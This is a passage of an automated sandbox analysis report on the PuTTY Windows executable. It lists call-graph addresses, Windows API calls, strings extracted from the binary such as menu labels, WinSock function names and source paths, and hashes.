81260->81261 81262 7ff738a7ee35 81261->81262 81263 7ff738a6db90 134 API calls 81261->81263 81264 7ff738a59f60 SetWindowTextA 81262->81264 81263->81262 81264->81224 81269 7ff738a5930d 81265->81269 81271 7ff738a59349 81265->81271 81267 7ff738a71980 98 API calls 81267->81269 81268 7ff738a59364 SendDlgItemMessageA SendDlgItemMessageA 81268->81237 81269->81267 81269->81271 81271->81268 81298 7ff738afa0ec 98 API calls 3 library calls 81271->81298 81272->81234 81273->81239 81274->81249 81275->81253 81276->81237 81277->81250 81278->81254 81279->81231 81280->81238 81283 7ff738a6f680 134 API calls 81282->81283 81284 7ff738a6dbb6 81283->81284 81285 7ff738a6dbe6 81284->81285 81299 7ff738afa0ec 98 API calls 3 library calls 81284->81299 81287 7ff738a6dc06 81285->81287 81300 7ff738afa0ec 98 API calls 3 library calls 81285->81300 81289 7ff738a70ca0 134 API calls 81287->81289 81290 7ff738a6dc17 81289->81290 81294 7ff738a6dc42 81290->81294 81301 7ff738a722e0 98 API calls swprintf 81290->81301 81292 7ff738a6dc2f 81293 7ff738a70ca0 134 API calls 81292->81293 81293->81294 81294->81255 81295->81256 81296->81258 81298->81268 81299->81285 81300->81287 81301->81292 81302 7ff738a5653b 81303 7ff738a57aa0 135 API calls 81302->81303 81304 7ff738a5654c 81303->81304 81305 7ff738a6f680 134 API calls 81304->81305 81311 7ff738a5656b 81305->81311 81306 7ff738a56a96 81349 7ff738a54850 81306->81349 81308 7ff738a57aa0 135 API calls 81308->81311 81310 7ff738a56acb 81312 7ff738a6f680 134 API calls 81310->81312 81330 7ff738a55e35 81310->81330 81311->81306 81311->81308 81359 7ff738afa0ec 98 API calls 3 library calls 81311->81359 81313 7ff738a57535 81312->81313 81314 7ff738a70ca0 134 API calls 81313->81314 81315 7ff738a57570 81314->81315 81316 7ff738a5758e 81315->81316 81360 7ff738afa0ec 98 API calls 3 library calls 81315->81360 81318 7ff738a70ca0 134 API calls 81316->81318 81319 7ff738a5759f 81318->81319 81328 7ff738a575bd 81319->81328 81361 7ff738afa0ec 98 API calls 3 library calls 81319->81361 81320 
7ff738a579e9 81321 7ff738ae9230 swprintf 8 API calls 81320->81321 81324 7ff738a579fd 81321->81324 81322 7ff738a57904 81322->81320 81325 7ff738a54750 4 API calls 81322->81325 81325->81320 81326 7ff738afa0ec 98 API calls 81326->81330 81340 7ff738a57630 81328->81340 81362 7ff738affacc 63 API calls 81328->81362 81363 7ff738afa0ec 98 API calls 3 library calls 81328->81363 81329 7ff738a57a5a 81368 7ff738afa0ec 98 API calls 3 library calls 81329->81368 81330->81322 81330->81326 81330->81329 81333 7ff738a57a73 81369 7ff738a37d20 100 API calls swprintf 81333->81369 81334 7ff738a71980 98 API calls 81334->81340 81336 7ff738a57a78 81337 7ff738a576a5 GetDlgItem 81337->81340 81340->81330 81340->81334 81340->81337 81343 7ff738a57710 81340->81343 81364 7ff738afa0ec 98 API calls 3 library calls 81340->81364 81365 7ff738afa0ec 98 API calls 3 library calls 81340->81365 81341 7ff738a71980 98 API calls 81341->81343 81342 7ff738a57755 GetDlgItem 81342->81343 81343->81330 81343->81341 81343->81342 81346 7ff738a577fc GetDlgItem 81343->81346 81347 7ff738a5781c ScreenToClient 81343->81347 81366 7ff738afa0ec 98 API calls 3 library calls 81343->81366 81367 7ff738afa0ec 98 API calls 3 library calls 81343->81367 81346->81343 81347->81343 81348 7ff738a57850 SetWindowPos 81347->81348 81348->81343 81350 7ff738a54881 81349->81350 81355 7ff738a548d4 81349->81355 81351 7ff738a54750 4 API calls 81350->81351 81351->81355 81352 7ff738a548dd 81353 7ff738ae9230 swprintf 8 API calls 81352->81353 81354 7ff738a54a70 81353->81354 81354->81310 81355->81352 81356 7ff738a54750 4 API calls 81355->81356 81357 7ff738a54974 81356->81357 81357->81352 81358 7ff738a54750 4 API calls 81357->81358 81358->81357 81359->81311 81360->81316 81361->81328 81362->81328 81363->81328 81364->81337 81365->81340 81366->81342 81367->81343 81368->81333 81369->81336 81370 7ff738a566fe 81371 7ff738a57aa0 135 API calls 81370->81371 81372 7ff738a5670b 81371->81372 81373 7ff738a56761 81372->81373 81374 7ff738a56750 SendMessageA 81372->81374 
81375 7ff738a54750 4 API calls 81373->81375 81374->81373 81376 7ff738a567bc 81375->81376 81377 7ff738a6f680 134 API calls 81376->81377 81395 7ff738a55e35 81376->81395 81378 7ff738a57535 81377->81378 81379 7ff738a70ca0 134 API calls 81378->81379 81380 7ff738a57570 81379->81380 81381 7ff738a5758e 81380->81381 81414 7ff738afa0ec 98 API calls 3 library calls 81380->81414 81383 7ff738a70ca0 134 API calls 81381->81383 81384 7ff738a5759f 81383->81384 81393 7ff738a575bd 81384->81393 81415 7ff738afa0ec 98 API calls 3 library calls 81384->81415 81385 7ff738a579e9 81387 7ff738ae9230 swprintf 8 API calls 81385->81387 81390 7ff738a579fd 81387->81390 81388 7ff738a57904 81388->81385 81392 7ff738a54750 4 API calls 81388->81392 81389 7ff738afa0ec 98 API calls 81389->81395 81392->81385 81405 7ff738a57630 81393->81405 81416 7ff738affacc 63 API calls 81393->81416 81417 7ff738afa0ec 98 API calls 3 library calls 81393->81417 81394 7ff738a57a5a 81422 7ff738afa0ec 98 API calls 3 library calls 81394->81422 81395->81388 81395->81389 81395->81394 81398 7ff738a71980 98 API calls 81398->81405 81399 7ff738a57a73 81423 7ff738a37d20 100 API calls swprintf 81399->81423 81401 7ff738a576a5 GetDlgItem 81401->81405 81402 7ff738a57a78 81405->81395 81405->81398 81405->81401 81408 7ff738a57710 81405->81408 81418 7ff738afa0ec 98 API calls 3 library calls 81405->81418 81419 7ff738afa0ec 98 API calls 3 library calls 81405->81419 81406 7ff738a71980 98 API calls 81406->81408 81407 7ff738a57755 GetDlgItem 81407->81408 81408->81395 81408->81406 81408->81407 81411 7ff738a577fc GetDlgItem 81408->81411 81412 7ff738a5781c ScreenToClient 81408->81412 81420 7ff738afa0ec 98 API calls 3 library calls 81408->81420 81421 7ff738afa0ec 98 API calls 3 library calls 81408->81421 81411->81408 81412->81408 81413 7ff738a57850 SetWindowPos 81412->81413 81413->81408 81414->81381 81415->81393 81416->81393 81417->81393 81418->81401 81419->81405 81420->81407 81421->81408 81422->81399 81423->81402 81424 7ff738a67464 81428 
7ff738a67477 81424->81428 81425 7ff738a674a8 81426 7ff738a6de80 134 API calls 81425->81426 81427 7ff738a67677 81426->81427 81428->81425 81429 7ff738a76a00 134 API calls 81428->81429 81429->81425 81430 7ff738a5647f 81431 7ff738a57aa0 135 API calls 81430->81431 81432 7ff738a5648c 81431->81432 81433 7ff738a564a8 81432->81433 81434 7ff738a56c56 81432->81434 81435 7ff738a570ad 81433->81435 81436 7ff738a564b6 81433->81436 81439 7ff738a54750 4 API calls 81434->81439 81446 7ff738a56d5e 81434->81446 81437 7ff738a57122 81435->81437 81441 7ff738a54750 4 API calls 81435->81441 81438 7ff738a56525 81436->81438 81442 7ff738a54750 4 API calls 81436->81442 81443 7ff738a54750 4 API calls 81437->81443 81445 7ff738a54750 4 API calls 81438->81445 81440 7ff738a56d00 81439->81440 81444 7ff738a54750 4 API calls 81440->81444 81441->81437 81442->81438 81443->81446 81444->81446 81445->81446 81447 7ff738a6f680 134 API calls 81446->81447 81465 7ff738a55e35 81446->81465 81448 7ff738a57535 81447->81448 81449 7ff738a70ca0 134 API calls 81448->81449 81450 7ff738a57570 81449->81450 81451 7ff738a5758e 81450->81451 81484 7ff738afa0ec 98 API calls 3 library calls 81450->81484 81453 7ff738a70ca0 134 API calls 81451->81453 81454 7ff738a5759f 81453->81454 81463 7ff738a575bd 81454->81463 81485 7ff738afa0ec 98 API calls 3 library calls 81454->81485 81455 7ff738a579e9 81456 7ff738ae9230 swprintf 8 API calls 81455->81456 81459 7ff738a579fd 81456->81459 81457 7ff738a57904 81457->81455 81460 7ff738a54750 4 API calls 81457->81460 81460->81455 81461 7ff738afa0ec 98 API calls 81461->81465 81475 7ff738a57630 81463->81475 81486 7ff738affacc 63 API calls 81463->81486 81487 7ff738afa0ec 98 API calls 3 library calls 81463->81487 81464 7ff738a57a5a 81492 7ff738afa0ec 98 API calls 3 library calls 81464->81492 81465->81457 81465->81461 81465->81464 81468 7ff738a57a73 81493 7ff738a37d20 100 API calls swprintf 81468->81493 81469 7ff738a71980 98 API calls 81469->81475 81471 7ff738a57a78 81472 7ff738a576a5 GetDlgItem 
81472->81475 81475->81465 81475->81469 81475->81472 81477 7ff738a57710 81475->81477 81488 7ff738afa0ec 98 API calls 3 library calls 81475->81488 81489 7ff738afa0ec 98 API calls 3 library calls 81475->81489 81476 7ff738a71980 98 API calls 81476->81477 81477->81465 81477->81476 81478 7ff738a57755 GetDlgItem 81477->81478 81481 7ff738a577fc GetDlgItem 81477->81481 81482 7ff738a5781c ScreenToClient 81477->81482 81490 7ff738afa0ec 98 API calls 3 library calls 81477->81490 81491 7ff738afa0ec 98 API calls 3 library calls 81477->81491 81478->81477 81481->81477 81482->81477 81483 7ff738a57850 SetWindowPos 81482->81483 81483->81477 81484->81451 81485->81463 81486->81463 81487->81463 81488->81472 81489->81475 81490->81478 81491->81477 81492->81468 81493->81471 81494 7ff738a563c0 81495 7ff738a56d6b 81494->81495 81496 7ff738a563ca 81494->81496 81497 7ff738a54750 4 API calls 81495->81497 81543 7ff738a54a90 GetDC 81496->81543 81500 7ff738a56dc6 SetDlgItemTextA 81497->81500 81559 7ff738a78cd0 6 API calls 81500->81559 81502 7ff738a57aa0 135 API calls 81503 7ff738a563f3 81502->81503 81504 7ff738a54750 4 API calls 81503->81504 81507 7ff738a5646c 81504->81507 81505 7ff738a6f680 134 API calls 81506 7ff738a57535 81505->81506 81508 7ff738a70ca0 134 API calls 81506->81508 81507->81505 81524 7ff738a55e35 81507->81524 81509 7ff738a57570 81508->81509 81510 7ff738a5758e 81509->81510 81560 7ff738afa0ec 98 API calls 3 library calls 81509->81560 81512 7ff738a70ca0 134 API calls 81510->81512 81513 7ff738a5759f 81512->81513 81522 7ff738a575bd 81513->81522 81561 7ff738afa0ec 98 API calls 3 library calls 81513->81561 81514 7ff738afa0ec 98 API calls 81514->81524 81515 7ff738a579e9 81516 7ff738ae9230 swprintf 8 API calls 81515->81516 81519 7ff738a579fd 81516->81519 81517 7ff738a57904 81517->81515 81520 7ff738a54750 4 API calls 81517->81520 81520->81515 81534 7ff738a57630 81522->81534 81562 7ff738affacc 63 API calls 81522->81562 81563 7ff738afa0ec 98 API calls 3 library calls 81522->81563 81523 
7ff738a57a5a 81568 7ff738afa0ec 98 API calls 3 library calls 81523->81568 81524->81514 81524->81517 81524->81523 81527 7ff738a57a73 81569 7ff738a37d20 100 API calls swprintf 81527->81569 81528 7ff738a71980 98 API calls 81528->81534 81530 7ff738a57a78 81531 7ff738a576a5 GetDlgItem 81531->81534 81534->81524 81534->81528 81534->81531 81537 7ff738a57710 81534->81537 81564 7ff738afa0ec 98 API calls 3 library calls 81534->81564 81565 7ff738afa0ec 98 API calls 3 library calls 81534->81565 81535 7ff738a71980 98 API calls 81535->81537 81536 7ff738a57755 GetDlgItem 81536->81537 81537->81524 81537->81535 81537->81536 81540 7ff738a577fc GetDlgItem 81537->81540 81541 7ff738a5781c ScreenToClient 81537->81541 81566 7ff738afa0ec 98 API calls 3 library calls 81537->81566 81567 7ff738afa0ec 98 API calls 3 library calls 81537->81567 81540->81537 81541->81537 81542 7ff738a57850 SetWindowPos 81541->81542 81542->81537 81544 7ff738a6fd50 134 API calls 81543->81544 81545 7ff738a54ad2 81544->81545 81546 7ff738a6f680 134 API calls 81545->81546 81547 7ff738a54aee SetMapMode MapDialogRect SendMessageA SelectObject 81546->81547 81548 7ff738a54d28 SelectObject ReleaseDC 81547->81548 81549 7ff738a54b6f 81547->81549 81550 7ff738a54d4a 81548->81550 81551 7ff738a54b85 GetTextExtentExPointA 81549->81551 81552 7ff738ae9230 swprintf 8 API calls 81550->81552 81556 7ff738a54bbe 81551->81556 81557 7ff738a54ca8 81551->81557 81553 7ff738a54d6f 81552->81553 81553->81502 81555 7ff738afd5e0 62 API calls 81555->81556 81556->81555 81556->81557 81558 7ff738a54cbb GetTextExtentExPointA 81556->81558 81570 7ff738a6ecc0 8 API calls swprintf 81556->81570 81557->81548 81558->81556 81558->81557 81559->81507 81560->81510 81561->81522 81562->81522 81563->81522 81564->81531 81565->81534 81566->81536 81567->81537 81568->81527 81569->81530 81570->81556 81571 7ff738a7ea20 81572 7ff738a7ea7f 81571->81572 81575 7ff738a7ea48 81571->81575 81607 7ff738a58f50 135 API calls swprintf 81572->81607 81574 7ff738a7eb4a 81577 

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$Menu$Append$Window$Create$Rect$ClientInfoMessageMonitor$CapsDesktopDeviceFormat$ActiveBitmapCaretClickClipboardDeleteDialogDoubleErrorFromInitializeLastLongParamPopupRegisterReleaseScrollShowSystemTime
                                                          • String ID: %s Fatal Error$&About %s$&Copy$&Duplicate Session$&Event Log$&Full Screen$&Help$&Paste$($(No sessions)$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$AdjustWindowRectExForDpi$C&lear Scrollback$C&opy All to Clipboard$Chan&ge Settings...$Failed to initialize COM subsystem$FlashWindowEx$GetDpiForMonitor$GetMonitorInfoA$GetSystemMetricsForDpi$MSWHEEL_ROLLMSG$MonitorFromPoint$MonitorFromWindow$Ne&w Session...$PlaySoundA$PlaySoundW$Rese&t Terminal$Running with restricted process ACL$Sa&ved Sessions$ToUnicodeEx$Unable to create terminal window: %s$shcore.dll$term->mouse_select_clipboards[0] == CLIP_LOCAL$user32.dll$winmm.dll
                                                          • API String ID: 4040790088-3869385243
                                                          • Opcode ID: 8e22c9a735b0087f7fa0f1cf9938a339a5747c054baf8c72b16f9b8503ebbc09
                                                          • Instruction ID: d13d59ffa6fb6d130f789b7165ccd66427c38d2f58f6e07489e72e18588e6c0a
                                                          • Opcode Fuzzy Hash: 8e22c9a735b0087f7fa0f1cf9938a339a5747c054baf8c72b16f9b8503ebbc09
                                                          • Instruction Fuzzy Hash: 0282F232A09A42A6E754EB25E8107B9F3A1FF85B80F804231DE0D43B95DF7EE455E319

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$Startup$LibraryLoad
                                                          • String ID: Unable to initialise WinSock$Unable to load any WinSock library$WSAAddressToStringA$WSAAsyncSelect$WSACleanup$WSAEnumNetworkEvents$WSAEventSelect$WSAGetLastError$WSAIoctl$WSAStartup$accept$bind$closesocket$connect$freeaddrinfo$getaddrinfo$gethostbyname$gethostname$getnameinfo$getpeername$getservbyname$getsockname$htonl$htons$inet_addr$inet_ntoa$inet_ntop$ioctlsocket$listen$ntohl$ntohs$recv$select$send$setsockopt$shutdown$socket$ws2_32.dll$wship6.dll$wsock32.dll
                                                          • API String ID: 1450042416-2366807250
                                                          • Opcode ID: 93f9ef0fcb9e3cbeadd62765476b580965984e81a97872986af182b56776c462
                                                          • Instruction ID: d281cc52e4cbbd8fadf6bab67464970412b310631d46d597ce2ff8ed2624e866
                                                          • Opcode Fuzzy Hash: 93f9ef0fcb9e3cbeadd62765476b580965984e81a97872986af182b56776c462
                                                          • Instruction Fuzzy Hash: 052288A6A0AB03A0FE45FB14E864778E3A0BF44750FD04635C44D46668EF7FB944A63E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$Window$Rect$Dialog$CreateTimer$ClientDestroyFocusIconInvalidateItemKillLoadLongShowText
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/dialog.c$@$Cate&gory:$Demo screenshot failure$STATIC$SysTreeView32$firstpath$j == ctrl_path_elements(s->pathname) - 1
                                                          • API String ID: 443372750-2014718063
                                                          • Opcode ID: 26a8d7d2dd6c0980407e8ea79a2d1d785de7e4f7d815cc237f4b59a289379c27
                                                          • Instruction ID: 11c9eddb2d9252bc8a4b2838d5845e7ade69493cdfef0c0cffc07fc8df8734c2
                                                          • Opcode Fuzzy Hash: 26a8d7d2dd6c0980407e8ea79a2d1d785de7e4f7d815cc237f4b59a289379c27
                                                          • Instruction Fuzzy Hash: C932C773B09A8295EB20AB25E410BBAF350FB84B84F844235DE8D47B95DF3EE445E714

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: FileView$CloseCommandHandleLineUnmap
                                                          • String ID: %s Warning$%s expects an output filename$%s expects input and output filenames$-$--host-ca$--host_ca$-cleanup$-demo-config-box$-demo-terminal$-pgpfp$This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?$can't open input file '%s'$demo-server.example.com$option "%s" requires an argument$unexpected argument "%s"$unknown option "%s"
                                                          • API String ID: 2122081399-1841002763
                                                          • Opcode ID: 92fe8418ad11dffc96ac489ca1a48aa20ec0e8965734d313fe82a7d3d640208b
                                                          • Instruction ID: dba7272dcf8e7b4979c855b67e9c0aec200df63927976c2b4b2d02dab84bc552
                                                          • Opcode Fuzzy Hash: 92fe8418ad11dffc96ac489ca1a48aa20ec0e8965734d313fe82a7d3d640208b
                                                          • Instruction Fuzzy Hash: B7C19F62A0E643A1FA54BB22D811BB9D2415F41BC0FC44436ED0E477D6EEBFE505A229

                                                          Control-flow Graph

                                                          APIs
                                                          • SetDlgItemTextA.USER32 ref: 00007FF738A56DDC
                                                            • Part of subcall function 00007FF738A54A90: GetDC.USER32 ref: 00007FF738A54AC4
                                                            • Part of subcall function 00007FF738A54A90: SetMapMode.GDI32 ref: 00007FF738A54AFE
                                                            • Part of subcall function 00007FF738A54A90: MapDialogRect.USER32 ref: 00007FF738A54B38
                                                            • Part of subcall function 00007FF738A54A90: SendMessageA.USER32 ref: 00007FF738A54B54
                                                            • Part of subcall function 00007FF738A54A90: SelectObject.GDI32 ref: 00007FF738A54B60
                                                            • Part of subcall function 00007FF738A54A90: GetTextExtentExPointA.GDI32 ref: 00007FF738A54BB0
                                                            • Part of subcall function 00007FF738A54750: MapDialogRect.USER32 ref: 00007FF738A54770
                                                            • Part of subcall function 00007FF738A54750: CreateWindowExA.USER32 ref: 00007FF738A547DF
                                                            • Part of subcall function 00007FF738A54750: SendMessageA.USER32 ref: 00007FF738A547FA
                                                            • Part of subcall function 00007FF738A54750: SetWindowPos.USER32 ref: 00007FF738A54834
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: DialogMessageRectSendTextWindow$CreateExtentItemModeObjectPointSelect
                                                          • String ID: !dp->shortcuts[s]$(ctrl->columns.ncols == 1) ^ (ncols == 1)$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$EDIT$STATIC$ncols <= lenof(columns)$ret == c$thisc$win
                                                          • API String ID: 2829272046-217711369
                                                          • Opcode ID: e618d24459d988de02455c9c6bf2082abed2e598ebb5d6e6ebfa3467bdfa5aa0
                                                          • Instruction ID: a4d4df0dae8b7eb197e7a876f2e2a588935f84d39a528a3ed282855021015dfc
                                                          • Opcode Fuzzy Hash: e618d24459d988de02455c9c6bf2082abed2e598ebb5d6e6ebfa3467bdfa5aa0
                                                          • Instruction Fuzzy Hash: A812C3B3A096C696E720AB19E4417BAF360FB84784F844231DE8D43B94EF3EE584D754

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: HtmlHelpA$Software\SimonTatham\PuTTY64\CHMPath$Software\SimonTatham\PuTTY\CHMPath$hhctrl.ocx
                                                          • API String ID: 190572456-509675872
                                                          • Opcode ID: 587ab05f2c0cdda8c7c30573f5bb13d947c44d7a9711b9a4aacebe547fce5185
                                                          • Instruction ID: e7eae3b4daa5bfd7c8e29ccabf76480bef9fb007759ed51c5acf9088251dcdb9
                                                          • Opcode Fuzzy Hash: 587ab05f2c0cdda8c7c30573f5bb13d947c44d7a9711b9a4aacebe547fce5185
                                                          • Instruction Fuzzy Hash: 00314FA2E0E743A1FA55B724E824B34E2916F15754FD44235C85D063D4DFBFA84CB23A

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: NameUser$AddressProc
                                                          • String ID: GetUserNameExA$secur32.dll$sspicli.dll
                                                          • API String ID: 9235790-676772081
                                                          • Opcode ID: 43787fd4701c189b76fb93f1a7ce50da9bfb4e153f5b92efbd84c6d7929e2dd1
                                                          • Instruction ID: 167c460b8bddb64bff2711fa073fd8c9bc8858a87b1b2c8caeca22c82e248022
                                                          • Opcode Fuzzy Hash: 43787fd4701c189b76fb93f1a7ce50da9bfb4e153f5b92efbd84c6d7929e2dd1
                                                          • Instruction Fuzzy Hash: 0E311623A0E112A6FA61B720D450B7AD390DF84B80FC48135D94E0BF84CE7EE906E769
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend_set_error_mode
                                                          • String ID: !dp->shortcuts[s]$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$0$COMBOBOX$LISTBOX$STATIC$ret == c$ud
                                                          • API String ID: 3184551911-625819953
                                                          • Opcode ID: 64979b4be17955331d877ea59f8c46f0631de89c97ef96b58b2f2540d5c947d2
                                                          • Instruction ID: 77c444c2db2b9ed850763465a9015c9779b64ab63a53229fb2811c4da453d944
                                                          • Opcode Fuzzy Hash: 64979b4be17955331d877ea59f8c46f0631de89c97ef96b58b2f2540d5c947d2
                                                          • Instruction Fuzzy Hash: A9D1ADB36092C296E730DF05E440BAAF7A4FB88790F844235DA9947B99DF3ED144EB14

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad
                                                          • String ID: DrawInsert$InitCommonControls$LBItemFromPt$MakeDragList$comctl32.dll
                                                          • API String ID: 2238633743-1292723818
                                                          • Opcode ID: e2e23e6afa673d35b0ca70f87d541e277b31de276523b9c2df50b52eead36e3a
                                                          • Instruction ID: 0f7ddbd955abfa2ba1e5b80cdd4423c8581043834f39dc7c5ab07d2cc74231b9
                                                          • Opcode Fuzzy Hash: e2e23e6afa673d35b0ca70f87d541e277b31de276523b9c2df50b52eead36e3a
                                                          • Instruction Fuzzy Hash: 89F04F62A09A17B0E905BB11FD400A8F3E4EF457D0BC04332C80C03724EE7EA556E32A

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
